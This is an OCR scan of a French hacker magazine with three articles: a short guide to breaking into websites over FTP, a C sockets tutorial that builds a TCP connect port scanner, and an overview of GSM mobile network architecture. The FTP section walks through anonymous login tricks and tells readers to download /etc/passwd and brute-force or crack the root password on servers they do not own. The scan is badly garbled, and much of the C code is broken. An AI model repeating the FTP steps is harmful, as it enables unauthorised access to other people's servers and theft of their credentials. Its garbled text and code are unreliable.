100 000 (et encore). Mais qui sais peut être que s1 vous avez déjà 
gagnez au loto... vous trouverez un serveur non sécurisé. De 
toute façon nous c’est la technique qu’on veut:c’est pas les pra- 
tiques illégales qu’on peut faire avec :) 


Pour hacker un site par FTP nous allons ouvrir l'url concerné, 
puis passer le login... sans login, puis passer le pass... sans pass. 


Exemple : C\WINDOWS>fip -1 


ftp> open www.impfrance.com //amt… de toute façon ça 


marche pas 
Connecté à www.dmpfrance.com. 
220 wwwampfrance.com FTP server ready. 
fip> quote user fin {entrer quote user ftp 


301 Guest login ok, send your complete e-mail address as password. 


fp> quote cwd root | //entrer quote ci root 
590 Please login with user and pass. 

fp> quote pass fp //entrer quote pass fp 
230 Guest login ok, access restriction apply 

fp> 


e% (À 


. de De eg, 
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Le problème c’est que vous serez logué sur le site mais pas en tant 
que root donc vous n’aurez pas toutes les possibilités. Pour être 
logé en tant que root remplacez au début : fp> open www.ümpfrance.com 
par fp> open &quot open www.dmpfrance.com&quot, mais la faut plus de 
chance qu'au loto ! 


Bon maintenant que vous êtes logé sur le site (en tant que root 


.ounon) voyons les commandes ftp qui vontnous permettre demodi- 


fier le site (petit rappel car tout le monde n’a pas hzv #1). 
kdir : créer un répertoire 

rmdir : supprimer un répertoire 

pwd : se repérer sur le disque 

cd : aller dans un répertoire 


* dir : voir le contenue de la racine ou du répertoire ou l’on se 


trouve, Pour différencier un fichier d’un répertoire, regardezlepre- 
mier caractère qui est soir une lettre (répertoire) soir [-] (fichier). 


. cd / : revenir à la racine du répertoire 


cd . : revenir au répertoire précédent 

del : supprimer un fichier 

get : prendre un fichier pour le mettre sur le bureau 

put : mettre un fichier de votre bureau sur le serveur 

ascii : passe la connection en mode ascit 

binary : passe la connection en mode binaire 

system : trouver la version du demonet le type d’OSsous lequel tour- 
ne le serveur 

open : établir une connection avec un serveur distant 

quit : se déconnecter du serveur distant 

Entrez les commandes comme ça : 

fp>get pass.xt //c'est seulement un exemple ! 

Cherchons maintenant le pass du root pour obtenir tous les pou- 
voirs (sauf si vous avez déjà gagné 3 ou 4 fois le pactole). Le 
fichier contenant les pass se nomme généralement ” passwd "et 
se situe dans le rép /etc/passwd. Siil y est pas cherchez mais il est 
toujours facilement accessible. Quand vous avez obtenue le 
fichier de pass 1l suffit de le décrypter avec un brute force mais si 
il est shadow (en étoile koi) y a plus qu'a vérifier l'OS utilisé par 
le serveur pour utiliser le bon password cracker. 


PassRetrieve_ 00 
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… Comme Ça Îu pourras essayer notre scanner de port 





aura pour thème la programmation réseau en 
langage C sous unix, et ses applications dans 
le domaine de la sécurité info évidement.ls'adres- 
Se à des personnes ayant un minimum de connais- 
sance dans le domaine de la programmation 
en langage C et des réseaux. Si j'ai choisi de 
faire cette article c'est parce que je trouve 
qu'il est intéressant de savoir comment mar- 
chent tous les outils que sont les scanners, 
les sniffers etc. Etaprès vous pourrez aller vous 
la péter sur IRC (J'ai codé un scan je suis 
trop fort !!). Toutefois, nous allons commen- 
cer à la base (Et oui ! Désolé pour les 1337), 
enprésentantles rudiments etenprogrammant 
un petit scanner de ports très simple. Nous 
ne nous pencherons pas pour le moment sur 


laprogrammation de socket de typeraw(Réser- | 


vé aux vrais leets;), permettant de forger ses 
propres packets a l'état brut au niveau de la 
couche IP (Utilisé pour le snoofing par exemple) 
mais nécessitant une bonne connaissance des 
RFGs et des connaissances en programmation 
plus avancées. Bien, sur ce, mettons nous au tra- 
vail! Alors pour commencer installer vous confor- 
tablement dans votre siège, booter sur votre 
distributeur préféré (Un unix évidement), allu- 
mez vous une clope, mettez le HZV sur vos genoux 
et appliquer. (C'est pas dur ! ). 


Cette article est le premier d'une suite qui 





Les sockets : 

Le concept de base d'une socket est le suivant : C'est une API 
(Application Program Interface) qui va permettre le transfert de 
données entre 2 processus ( distants ou non, nous verrons ça plus 
loin). Donc pour communiquer, nousallons devoir créer, dansnotre 
cas, un socket sur le client et tenter de nous connecter à un socket 
sur le serveur, et c'est en écrivant dans cette socket que nos appli- 
cations respectives vont pouvoir communiquer. 

En langage C, la création d'une socket se présente sous cette forme : 


int socket(int domain, int type, int protocol); 


Vous pouvez constater qu'une socket est définie par 3 éléments. Nous 
allons les détailler : 


domain: Il s'agit du domaine d'adressage de la socket. 
On pourra distinguer les deux options, 
principales(Il y en a d'autre) : 


- AF_INET : Internet .C'est celle qui nous 
intéresse. | | 
- AF_UNIX : Unix. (Pour la communica- 
tion inter-processus.) 


type : Il s'agit du type de socket, c'est à direla 
manière dont elle va transmettre les données. 
Ses valeurs possibles sont pour les modes : 


Direct Protocole : .SOCK_RAW (Pour les 1337, c'est pour 
écrire directement ses paquets IP). 

Mode non-connecté : SOCK_DGRAM 

Mode connecté : SOCK_STREAM 

(IL y en a d'autres mais elles ne sont pas intéressantes à notre niveau.) 


protocol : Comme son nom l'indique, il va définir le 
type de protocole de la socket(A noter que 
les socket AF_UNIX n'en ont pas). 
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Ses options sont les suivantes : 


0: Vous laissez au système le choix de déter- 
miner le protocole. Par défaut, 1l choisira 
le TCP pour le mode connecté et UDP 
pour le non connecté. Logique non ? 
Pour le protocole UDP 

Pour le protocole TCP 


IPPROTO_UDP : 
JPPROTO_TCP : 


(Il yen a d'autres, mais pareil ! Ça ne nous intéresse pas.) 


Nous avons définie ce qu'étais une socket. Voici un exemple de 


socket possible : 
Ex : MaSocket = sockel(AF_INETSOCK: STREAM, D) 


Voici une socket internet en mode connecté, avec le protocole 
TCP(choisi par défault par lesystem pour üntypeSOCK_STREAM). 


Note : Bien que nous ne nous en servirons pas ici, il est bon de 
savoir que cessockets peuvent être parametre grâce à la fonctionset- 
sockopt, toutefois nous n'en avons pas besoins. 


Ca y est ! Nous savons maintenant créer des sockets. OUHAOU ! 
Bon, ben voila, on a une socket toute belle, mais maintenant 1l 
faut bien la connecter à quelque chose !! 

Ce quelque chose est bien c'est une socket distante ! Maintenant 


une chose s'impose pour pouvoir connecter notre socket à une 


autre socket distante : une adresse bien évidemment ! 

EnC, cetteadresseserareprésentéepar unestructure, lastructuresoc- 
kaddr (SOCket ADDResse pour les glandus ;).La structure soc- 
kaddr est une structure générique pour tout les types de socket, 
nous allons donc en utiliser une autre, plus particulière c'est à dire 
la structure sockaddr_in( in pour INternet) spécifique pour l'IPv4 
( Pour IPv6 c'est sockaddr .in6, mais on en est pas là !). 


ne. 


Bien penchons nous désormais sur la définition de cette structure : 


Struct sockadtr_in£ 


short sin family; 
u_ short Sin fort; 
Struct in_adr Sin auf: 
Char sin Zer0[8]; 
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Présentons maintenant cette structure. 


Il va représenter la famille d'adressage de 
la socket (AF_UNIX, AF_INETetc …). 


sin_family : 


sin_port : Tout bétement le numéro de port ou elle 
S écoute.(En format réseau attention !!!). 
sin_addr : Va représenter l'adresse 1p de la machine 


où l'on veut connecter notre socket.(For- 
mat réseau la aussi : une 1p et pas une 
dns!!!) 

sin_zero[8] : Ça sert a rien ca ! Mois on l'oublie. 
Voyons un exemple : 

L'initialisation de notre structure s'effectuera comme ceci : 


struct sockaddr in addrSock: 

addrSock.sin_ family = AF_INET, 

addrSock.sin_ port = htons(monPort); 

addrSock.sin_adde = “(struct in_addr *) serveur->h_ addr; 


Et la je sais ce que vous allez me dire : "Putain, bordel, on com- 
prend ked! C'est quothtonset*(structin_addr*)serveur->h_addr ?" 
Ne vous inquietez pas, vous allez comprendre. 

Onutilisela fonction htons(Host TO Network), pour convertir notre 
numéro de port au format réseau. 

"Bon, la longue ligne qui nous saoule maintenant cest quoi ?" 
Ça vous allez le voir avec l'étude de la structure suivante.(Un peu 
de patience allons …). 


C'est bien beau d'avoir l'adresse de notre socket de connexion, 
mais 1l faudrait peut être savoir où elle se trouve !! 

Ca, on va le faire grâce a la structure hostent. Cette structure va 
contenir les informations relatives à la machine(l'host) où se 
trouve le socket sur lequel on désire se connecter. Et ben allez ! 
C'est reparti pour la présentation de cette structure. 


Elle se présente sous la forme : 


Struct hostent{ 
Char “hi name; 
Char “"h_aliases; 
int h_addrlype; 
int h_lenght 
char *”“h_addr_1ist; 
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Voici à quoi correspondent ces éléments : 


h_name : Host_ NAME, vous m'avez compris, il 
s'agit d'une chaine de caractère représen- 
tant le nom de la machine. 

h_aliases : Il s'agit d'un tableau de chaînes, qui 
contient les éventuels alias de la machine. 

h_addrtype : Il s'agit du type d'adresse de l'host ([Pv4 
ou IPv6). 

h_lenght : Représente la longueur de l'adresse. 

h_addr- list : Représente un tableau contenant la liste 


des adresses de cet host. 


Ça s'éclaircit j'espères.?? 

Vous comprenez maintenant que le serveur->h_addr va repré- 
senter l'adresse du host. 

Pour récupérer les informations sur notre host maintenant, nous 
allons utiliser la fonction gethostbyname().(Comprendre : Récu- 
pérer les infos grâce au nom de la machine.) 


Cette fonction se présente comme suit: 
struct hostent *gethosthyname(const char “name 


Elle renvoit un pointeur sur uneStructure de type hostent (voir 
. plus haut)... \ à | 

L'utilisationdecettefonetionpeut doncêtreutiliséecommesuit par 
exemple: | 


true tostent monHost | 
… MonHost=gethosthyname(tomDeLaMachine) 
Cettéfonction vadoneutiliser lenom delamachine, pour récupérer 
les infos sur nôtre host. 


NousSavons maintenant créer une socket, l'adresser une socket 
distante et récupérerdes infos sur les hosts. 

Nous avonsmaintenant tout ce qu'il nous faut ! Plus qu'a 
connecter nôtre socketi! 

Et’bien pour celà, on va utilisemla fonction connect. 


int connect Soc, strüct sockadir *serv_addr Socklen_ + adrien 


Comme vous pouvez le constater, cette fonction prend pour . 


arguments : 








sockfd : 
struct sockaddr “serv_addr : 


C'est le nom de notre socket. 
C'est un pointeur vers une strucure de 
type sockaddr. (Notre adresse de socket). 


C'est la taille de notre structure soc- 
kaddr. 


socklent_t addrlen : 


Elle va renvoyer une valeur >= 0 si la connexion est réussie, et 
une adresse < 0 si c'est raté ! (logique) 


La fonction qui permet de fermer lesocket est close(nomDuSocket); 
Nous avons tout ce dont nous avons besoin ! C'est parti CoDiNg 
PoWa ;)))) 


Pour illustrer ce cours, nous allons coder un petit scanner de 
portsen modeconnecté tout bête. Pour cela, ilfautcomprendrecom- 
ment cela fonctionne. En. 

Alors un scanner de port ça marche comment ? 

Et bien, c'est facile ! En fait les différents services qui tournent 
surunserveur, nesont autres que des applications ayant générées des 


- sockets en attentes. De plus chaque socket est associé à un numé- 


ro de port. Il ne nous reste plus qu'a tester si la connexion à ces 
différents sockets marche ou pas, si c'est le cas, le port est ouvert, 
sinon il est fermé. Ainsi pour notre scanner, nous allons tester 
tous Les ports souhaités en tentant une connexion au socket. 
Pour se faire, nous allons créer un socket sur notre machine, et 
tenter successivement de le connecter à tous les ports. Pour se 
faire, nous allons utiliser la fonction connect(voir plus haut), en 
changeant le numéro de port a chaque fois. On sait que si connect 
renvoie une valeur >= 0, la connexion est réussie ( et donc le 
port ouvert), sinon la connexion a échouée et le port est fermé ! 
On va donc se servir de ça pour scanner les ports ! Mouarf 


Voici le code source du HZV scann, avec le détails des explications : 
/* Hawscann.e codé par ReDiLs pour Hackerz Voice */ 
#nclude <stdio.h> 
#nclude <sys/socket. > 
#include <sys/types.h> 
#include <netdb.h> 


/* Connexion sur un port TP 1! */ 
/* Par soucis de simplicité et de place, les erreurs éventuelles ne sont pas traitées 
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FONCTION SCANN 


Argument : | 
serveurName -> chaîne de charactères représentant le nom du serveur à scanner 
nbrPorts -> Entier représentant le nombre de ports à scanner 

*/ | 


int scann(char serveur Namel|, int nbrPorts) 
struct sockaddr_in addrSocket; 
struct hostent “serveur; 


int fd,1,portsOuverts=0; 


serveur =gethostbyname(serveur Name); 
addrSocket.sin_family=AF_ INET; 
addrSocket.sin_addr="*(struct in_addr *) serveur->h_addr; 
printf("Scann sur : %s\n”,serveur->h_name); | | 
for(i=1;1<=nbrPorts;1++) 
{ 
fd=socket(AF_INET,SOCK_STREAM,0); 
addrSocket.sin_port=htons(i); 
if(connect(fd,(struct sockaddr *)&addrSocket, sizeof addrSocket)>=0) 


portsOuverts++; 
printf("Le port %d est ouvert !!\n"',1); 


} 

close(fd); 

return (portsOuverts); 
} 


int main() 


char “serveurName: 
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[Déclaration de la fonction scann 


{Déclaration delastructuresockaddr, nommé addr- 
Socket (pour addresse Socket ;) 

//Déclaration du pointeur serveur sur une struc- 
ture de type hostent. 

{Déclaration des variables. (fd pour lasocket, pour 
le coînpteur du for, portsOuverts pour le nombre 
de ports ouverts). 


//Récupération des informations du host par la fonc- 
tion gethostbyname(voir plus haut). | 

//Xnitialisation de la structure sockaddr 

//Affectation de l'adresse de la socket 

//Affichage du nom ded'host contenu dans notre 
structure hostent pointée par serveur 

//Début de la boucle for où seul le numéro de 
port va changer 


//Création de la socket de connexion 

//{nitialisation du numéro de port passé en for- 
mat réseau par la fonction htons(la aussi voir 
plus haut.) 

{Test si la connexion au socket est réussie 


//{ncrémente le nombre de ports ouverts 
//Affiche le numéro du port ouvert 


[Ferme la socket 


//Renvoie a la fonction main le nombre de ports 
ouverts 


| [Déclaration des variables 
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int nbrPorts.PortsOuverts: | nes *//serveurName pour lenom du serveur: PortsOu- 


Fr verts pour le nombre de ports ouverts 
printf("\n***\nHZV Scann Version 1.0\n «=CoDeD bY ReDiLs=- \n****\n\n"); //Sans commentaires 
. printf("Entrez l'adresse du serveur à scanner : ”); 


scanf("%s",serveur Name): //Récupération du nom du serveur 
printf('\nEntrez le nombre de ports à scariner (max 65535) : ”); 

scanf("%d",&nbrPorts); //Récupération du nombre de ports à scanner 
while(nbrPorts<=0 || nbrPorts> 65535) //Test si le nombre de ports saisi est correet 


//Sinon, redemande une saisie 
printf("'Le nombre de ports entré est invalide !! Recommencer : ”); 
scanf("%d",&nbrPorts); 
h C 


printf("\nScann efreours, veuillez patienter ….\n"); 

PortsOuverts=scann(serveurName,nbr Ports); //Appel de la fonction scann qui va afficher les 
ports ouvertsetrenvoyer lenombre de portsouverts 

printf(!\n\n-=Scann terminé=-\nNombre de ports ouverts : %d\nNombre de ports scannés : %d\n!',PortsOuverts,nbrPorts): 

return (0; 


} 


Note : Les variables utilisées dans ce code sont certes longues, mais je les ai fais de la facon la plus explicite possible afin que vous com- 
. preniez ce qu'elle représente. De plus les commentaires sont parfois simplifiés, mais vous devez avoir compris les bases expliquées plus 
haut pour comprendre ce code. 


Explications supplémentaires : 


La fonction maimest chargée de récupérer le nom duserveur à scanner, ainsi que le nombre de ports souhaité, elle fait ensuite appel 

à la. fonction scann, puiselle affiche un bilan globale du scann. 

On a déclaré une fonction scann qui sera chargée descanner les ports un par un grâce à l'appel de la fonction connect.Le nom de la 
machine à scanner, ainsi que le nombrede ports à scanner sont passés en argument à la fonction scann. 

Elle se déroule en deux temps, récupération des infos sur le host puis balayage des ports. 


Pour l'instant, nousnous sommes contenté de tester des connexions sur des sockets distants, nous verrons plus tards comment il est 
possible d' écriredans ces sockets, et de réalisendesapplications communiquantes. Mais pour celail faut déjà avoir bien compriscecour Voilà, 
un petit gce Hzvscann.c -o Hzvscann et le tour est joué. Finis d'utiliser les scanns des autres vous avez maintenant le votre. C'est parti 
les H4XOS, à vous de jouer ! ;] 

Ce scanner est relativement simple, mais n'hésitez pas à y apporter des changements pour l'optimiser. De plus 1l sera détecté par tous les 
FireWall. Noûs verrons plus tard, qu'il est possible de récupérer des bannières et de faire pleins d'autres choses marrantes. 


Conclusion : J' espèr es quecet article vous aura plus et que vous aurez appris des choses. Sinon il y a toujours les manpages qui sont 

trés instructives s11l y a des str uctures ou des fonctions que vous avez du mal à cerner. Si quelquechose reste obscure dans votre esprit, 

si vous pensez que cetarticle n'a pas lieu d'être, si vous avez une idée de ce que vous aimeriez voir traiter sur la prog réseau dans mon 

prochaiarticle ou encore si vous trouvez que j'expliques comme une merde (Ou alors que j'explique bien, ca fais plaisir aussi) alors 
n'hésitez pas à me mailer ( redils@netcourrier.com) 


PS : Spécial Greetz to UzY ( merci d'être aussi sympa ). =ReDILS= 
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Salut à tous ! lecteurs de HZV et des manuels, voici ma premiére 


contribution au journal, je vous ai concocté un petit article sur les réseaux 


de téléphones portables et la norme GSM. 


mniro : 


Tous les téléphones portables que vous utilisez en ce moment uti- 
lisent cettenorme GSMdoncilest trèsimportant debien la connaître, 
c'est grâce à elle que vouspouvezappeler et vousconnecter sur Inter- 
net avec le WAP. Donc situons cette norme, elle fut créée en 
1982, et oui ça fait longtemps déjà, c’est la CEPT (Conférences Euro- 
péennes des Postes et Télécommunications) qui a défini pour la 
première fois une bande fréquence commune à toute l’Europe, 
900 MHz. C’est avec cette bande de fréquence que la norme GSM 
(Groupe Spécial Mobiles) fut définie afin de créer un système de com- 
munication européen avec les téléphones mobiles. Puisen 1990, pour 
Europe, fut attribuée unenouvelle bande de fréquence 1800 MHz. 
De nos jours nous sommes encore à ce stade, avec 2 bandes de fré- 
quence : 900 MHz et 1800 MHz. 


L'utilisation du GSM : 


La norme GSM décrit des systèmes numériques de communica- 
tion avec des téléphones mobiles. Pour communiquer le télépho- 
ne a besoin de 2 parties majeures : 

© L'équipement mobile qui permet au téléphone de communi- 
quer avec le réseau. | 

@ La carte SIM (Subscriver Identification Module), qui dans le 
cas d’un téléphone portable contient les informations person- 
nelles de l'utilisateur et ses droits. 


L'équipement d'un réseau GSM = 


Un réseau de type GSM a besoin de 6 principaux équipements 
qui vont servir, dans l'ordre, à assurer une couverture radioélec- 
trique du réseau, assurer la communication et l'exploitation, 
l'interconnexion, à gérer des bases de données, à localiser l'utili- 
sateur. Nous allons voir plus en détail chacun des ces équipe- 
ments afin de mieux comprendre l'acheminement de nos chères 
communications téléphoniques. | 


a) La station de base BTS (Base Trans- 
celver Station) : 

Les territoires sont découpés en de nombreuses parties, les cellules. 
À chaque cellule correspond une station de base BTS. La station est 
utilisée pour fournir des points d'entrée aux communications des 
utilisateurs ; ce type de station assure une couverture radioélectrique 
d'une cellule entière. La taille des cellules est très variable selon si on 
est dans une zone urbaine ou rurale (plus la densité de population 
est grande plus les cellules sont petites, minimum 200m, et si la den- 
sité de population est très faible la zone couverte par une cellule aug- 
mente jusqu'a 30Km). En effet les stations de base BTS ne peuvent 
gérer que 8 communications en même temps, car la technique de 
multiplexage AMRT a une limite de 8.On reverra plus tard quels 
sont les points de sécurité engendrés par ces stations. 


b) Le contrôleur de stations de base 
BSC (Base Station Controller) : 

Le contrôleur de station de base sert à la connexion entre plu- 
sieurs stations de base, dans un sens le contrôleur indique à une 
station de base l'arrivée d'un nouvel utilisateur et dans l'autre 
sensilindique à la base de données HLR la nouvelle position de l'uti- 
lisateur, Car à chaque fois que l'on s'apprête à changer de cellule 
les informations de notre carte SIM sont envoyéés à la base de 
donnée HLR avec notre future station de base. 


c) Le commutateur MSC (Mobile Switching 
Center) : 

La principale utilisation du commutateur MSC est d'assurer l'inter- 
connexion entre le réseau radio téléphonique-et le réseau de télépho- 
ne public filaire. Mais c'est aussi lui qui gère tous les services tels que 
les messageries, les envois de SMS. En plus de cela il fournit un accès . 
aux bases de données du réseau pour vérifier les droits des utilisa- 
teurs, il participe aussi à la gestion des déplacements des abonnés. 


d ) L'enregistreur de localisation nomi- 

nai HLR (Home Location Register) : 
L'enregistreur de localisation nominale est une base de données 
qui stocke des informations à propos des abonnés au réseau. 
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Selon les Fournisseurs d'Accès, 11 peut y avoir plusieurs HLR ou 
. un seul, cela dépend des machines, de leur espace disponible, en 
fait de l'investissement du fournisseur. Cette base de données très 
importante gère en permanences les lieux etinformations principales 
d'un utilisateur, tels que sa position, l'état de son téléphone (allu- 
mé, éteint, en communication….).Le HLR différencie les Termi- 
naux (Le Téléphone en lui-même) et les utilisateurs (carte SIM), 
car si on met sa carte SIM dans le téléphone d'un autre il faut bien 
quecesoitlepropriétairedelacarteSIM quipaieetnonlepropriétaire 
du téléphone. Le HLR enregistre les principales informations de 
la carte SIM telles que le numéro privé de l'utilisateur (celui ci est 
cryptéet ne peut être décrypté que par le HLR), des parties de son 
répertoire... Ba base de donnée de l'HLR contient toutes les 
informations sur tous les utilisateurs, leur abonnement, leur 
temps de communication, leur dernier emplacement. | 


e) Le centre d'authentification AUC 
(AUthentication Center) : 


Le centre d'authentification est aussi une base de donnée, celle-ci 
est utilisée pour identifier les utilisateurs et éviter les fraudes. 
Dans cette base de donnée sont enregistrés tous les numéros 
d'abonnement desutilisateurset leurs droits, afin qu’à toutmoment 
l'Opérateur soit au courant de l'état de la facture de n'importe 
quel utilisateur. En effet le réseau de téléphone portable est rela- 
tivement biensécurisé par plusieursprotections. La premièreest lors 
de l'allumage de notre terminalet l'entrée du code PIN, qui est 
comparée avec celui enregistré sur la carte SIM. Puis pour 
chaque demande de service au réseau, l'utilisateur doit s'identi- 
fier au près du AUC en envoyant son numéro d'abonnement qui 
eStensuite vérifié par rapport aux droits de Putilisateur par le 
AUC. Une fois cette vérification terminée, le réseau demande un 
résultat obtenu grâce à un algorithme secret, le résultat est 


ensuite envoyépuis vérifié, du Terminal jusqu'au AUC sans 


Jamais faire-passer l'algorithmesur le réseau pour des questions 
de sécurité, Toutes ces protections sont indispensables car le sys- 
tèmeemployé par les Opérateurs est que l'utilisateur ne peut pas 
contéster sa facture, donc les risques de fraudes doivent être 
minimums, (mais qu'en est-1l vraiment ? … :) 


f) L'enregistreur de localisation des visi- 

teurs VLR (Visitor Location Register) : 
L'enregistreur de localisation des visiteurs VLR est une base de don- 
néeassociée au commutateur MSC afin de recevoir et d'enregis- 
trer en permanence et de manière dynamique tout les déplacements 
de l'utilisateur. Le VLR tient une place importante dans le 
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réseau car c'est lui qui indique où se situe un terminal et qui 
signale quand celui-ci va devoir changer de BTS, A chaque utili- 
sateur est associé un identifiant afin que les informations de la 
communication aillent bien d'un terminal à un autre. 


Le Transit des appels : 
Il faut différencier les appels d’un abonné au réseau GSM vers un 
du RNIS, de l’appel d’un abonné du réseau RNIS vers un du GSM. 
Dans le premier cas, l’abonné compose le numéro de téléphone de 
soninterlocuteur, sa demandearriveau BTS puis vaau BSC, ilestalors 
identifiéetses droitssont vérifiés au niveau ducommutateur MSC puis 
sa demande arrive au'réseau public. Celui-ci demande à un BSC de 
réserver un canal pour que la futurecommunicationsoitpossible. Une 
fois que l'interlocuteur a décroché lacommunication est enfin établie. 
Dans le 2° cas, 1l y a encore plus d'étapes. ! Après la composition 
du numéro, la demande est envoyée vers lecommutateur dont dépend 
l'utilisateur du réseau, puis cette demande est expédiée au réseau 
GSM qui interroge le HLR afin de vérifier l'existence et de loca- 


‘ liser l'utilisateur demandé. Lorsque que l'interlocuteur est libre 


le réseau interroge le VLR pour savoir dans quelle cellule et donc 
vers quelle BSC la demande doit être envoyée. Une fois l’interlo- 
cuteur Joint, et libre, le BSC de la zone envoie un signal à tous 
les terminaux de sa zone avec le numéro demandé, Dès que le ter- 
minal contenant la carte SIM appropriée au numéro décroche, la 
communication est établie. 


0) Le centre d'exploitation et de main- 
tenance OMC : 
Le centre d'exploitation et de maintenance est la partie du réseau 
des opérateurs qui gère les problèmes techniques et la gestion 
administrative. La partie de la gestion administrative est en 
contact avec la base de donnée HLR, c'est elle qui gère la factu- 
ration, les changements d'abonnements ...En ce qui concerne la 
gestion des problèmes technique l'OMC sert à repérer les dys- 
fonctionnements dans le réseau, à gérer les mises a jour logiciels 


et'les problèmes de sécurité et de performances du réseau. 


Voilà pour ce qui concerne la partie physique du réseau on va 
maintenant voir la partie dela communication entre les termi- 


naux et les centres opérateurs. 


‘ 


La transmission Radio du GSM : 

Comme dans tous les types de réseaux (RNIS & GSM) les opéra- 
teurs utilisent différentes techniques de multiplexage (c’est ce qui 
sert a utiliser une même ligne pour faire passer plusieurs commu- 
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. mications). Il existe plusieurs techniques de multiplexage mais 
dans le réseau GSM, les opérateurs n’utilisent que le multiplexa- 
ge de fréquence et le multiplexage temporel : 


Le multiplexage par division de fréquence 
(FDM) : ETS k 


Le multiplexage fréquentiel FDM divise en 124 canaux de : 
200 kHz de large chacun, les deux plages de fréquences (890-915 MHz), . 


du terminal vers la station de base et (935-960 MHz) de la station 


de base vers le terminal, pour offrir 124 voies de communication 


duplex en parallèle (écart duplex 45 MHz en 900 MHz, 75 MHz 
en [800 MHz). Lemultiplexage fréquentiel est défini sur deux bandes : 
900 MHz pour le GSM et 1800 MHz pour le DCS. À 


Le multiplexage par division de temps (TDM) : 
Le TDM a 2 avantages principaux par rapport au FDM : 


- ILest bien plus efficace. 
- Il est capable de faire transiter des signaux numériques. 


Au lieu de diviser la bande passante en segments de fréquences, 


cette dernière est divisée en intervalle de temps, appelés slots. 

Le multiplexage par division statistique du temps (STDM), il 
s'apparente au TDM, hormis que lorsqu'il n'y à pas de données à 
transmettre, 1] ne transmet pas. ;-) 

Lemultiplexage temporel TDM partage l'usage d'une voie de trans- 
mission entre 8 communications différentes. Une trame se divise 


en 8 intervalles temporels d'une durée de 577 us. Chaque inter-. 


valle constitue un canal de communication dans lequel un messa- 
geélémentaire appelé paquet est transmis périodiquement. Ce paquet 
est un ensemble structuré de bits. 


Les couches : 


La transmission radio du GSM est définie par l’OSI (Open Sys- 
tem Interconnect) qui définit les 7 couches de fonctionnalité du réseau 
GSM. ça ne vous rappelle rien ? Si si, pour les réseaux d’ordina- 
teurs c’est pareil ! | | 

. La couche physique. 

. La couche de liaison de données. 

. La couche réseau. 

. La couche transport. 

. La couche session. 

. La couche présentation. 

. La couche application. 
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La couche physique : Cettecouche comprend tous les 
moyens physique d'émission et de réception radio du réseau 
GSM, pour cette interface radio GSM, elle assure le codage cor- 
recteur d'erreurs, et le multiplexage des canaux logiques. Les 
principaux canaux logiques présents sont : 

@ Les canaux de trafic (TCH pour Traffic Channel Full) qui 
sont utilisés dans le cas de téléphones portable comme moyen 
de transport de la voix. | | 

@ Les canaux de signalisations dédiés (SDCCH pour Stand 
alone Dedicated Control CHannel). 

© Lescanaux de contrôlecommuns (CCCH pour Common Control 
CHannel). 

@ Lescanaux de ‘broadcast’ (BCCH pour Broadcast Control CHan- 
nel). 

La couche physique est aussi un moment important dans l'envoi 
de données car c’est à ce moment-là que l’on décide du type de 
transmission (synchrone ou asynchrone), le débit du canal de 
transmission, le mode de transmission (analogique ou numé- 
rique), le type de codage pour la transmission, et le type de dia- 
logue (point à point ou point-multipoint). La couche physique 
échange ses données avec la couche de liaison de données. 


La couche de liaison de données : Cette couche-reçoit 
les trames envoyées par la couche physique puis les transforme en 


* paquets, ce système permet d'éviter des erreurs d'envoi de données. 


Cettecouchedétecteleserreursaumoment dela transformation, c’est 
l'utilisateur du réseau qui définit le taux minimum d'erreur. 


La couche réseau : Cette couche est utilisée pour gérer (éta- 
blir, maintenir, libérer) les liens utilisés pour les transmissions. 
La couche réseau peut être divisée en 3 sous-couches. 

@ Ressource radio (RR pour Radio Ressource). 

La couche RR est composée aussi de sous-couches, qui servent à 
alouer, relâcher etsuperviser lescanaux radio. Cettesous-coucheest 
aussi utilisée pour l'envoi demesures par lastation mobile et les pro- 
cédures de changements de cellules de l’utilisateur, elle gère le dépla- 
cement de l’utilisateur lorsque le terminal est en mode veille, elle 
gère aussi la procédure de chiffrement pour la sécurité du réseau. 
@ Gestion de la mobilité (MM pour Mobility Management). 

La sous-couche MM est utilisée en permanence pour situer un 
terminal lorsque celui- ci est allumé, elle sert aussi à la sécurité 
de utilisateur en gérant l’authentification et l'identité de l’uti- 
lisateur, enfin elle permet d’établir des connexions virtuelles uti- 
lisées par la sous-couche CC. | 
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© Gestion des connexions (CM pour Connection Management). 
Dans la sous-couche CM on peut voir plusieurs sous sous- 
couches qui sont : | 

æ La gestion des services supplémentaires. 

æ Le service des messages courts, les SMS. 

æ Le control d'appel (CC pour Call Control). 

La sous couche CC est utilisée pour établir et libérer des appels 
entre 2 abonnés. 


La couche transport : Cette couche est totalement invisible 
pour lesutilisateurs vu qu’elle gère leséchanges d’informationsentre 
différentes.entités du réseau, cette couche offre 5 classes de servi- 
ce à la couche dessession. Selon se$ besoins les opérateurs opte- 
ront pour une classe en particulière, voilà les 5 classes : 

æ Classe 0 : Ce service.est le service de base pour une couche 
de transport, cette classe vérifie la présence d’erreurs mais elle ne 
les corrige pas, elle est là pour répondre aux exigences des appli- 
cations de Télétex. 

# Classe 1 : Ce service n’offréqu’une capacité réduite de 
reprise Sur erreurs. 

# Classe 2 : C’est grâce à cette classe que l’on a le multi- 
plexage de plusieurs connexions, l'opérateur peut lui demander 
un contrôle de flux mais il n’y a pas de mécanisme de reprise 
suite à une erreur. | 

+ Classe 3 : Cette classe regroupe en fait les actions de classe 
let 2 c’est-à-dire.qu’elle offre le multiplexage et la reprise d’er- 
reurs Signalées par la couche réseau ainsi que le contrôle de flux. 
” Classe 4: Cestcette couche qui possède le plus d'actions 
possibles, elle peut contrôler le flux dedonnées, elle reprend les 
erreurs, elle gère le multiplexage. | 


La couche session: Cette couche gère la partie logiciel du 
système, elle repose sur l'hypothèse que letransport d’informa- 
tion est parfait, ce n'est pas somrôle. Elle sert aussi à synchroni- 
ser le dialogueentreles applications, et doit aussi contrôler lesservices 
offerts par la couche de transport. À chaque connexion des 
Options sont accessible au niveau de cette couche, les voilà : 

æ Onipeut définirila taille maximum des blocs de données. 

æ On peut aussi définir.le type de dialogue des utilisateurs, la 
qualité du son (Half Duplex, Full duplex ) 


La couche présentation : Cettecouche gère la description des 
données et sa syntaxe afin destructurer celle-ci. Elle utilise le langa- 
ge ASNA pour Abstract Syntax Notation One, pour négocier la 
présentation des données applicatrices et pour la syntaxe d'échange. 


TOUJOURS L'OCCUPATION DU 
TERRITOIRE DES LIiMBES 


La couche application :Cette couche est différente des‘: 
autres par le fait qu’elle ne s’occupe pas du transport des don- + 
nées mais de l'interface de communication pour l'utilisateur. Elle 
définit les interactions entre l’utilisateur et le système de commu- 
nication. | 


Voilà pour les 7 couches définit par l’ISO.Maintenant je pense 
que vous connaissez les bases des réseaux téléphoniques portables 
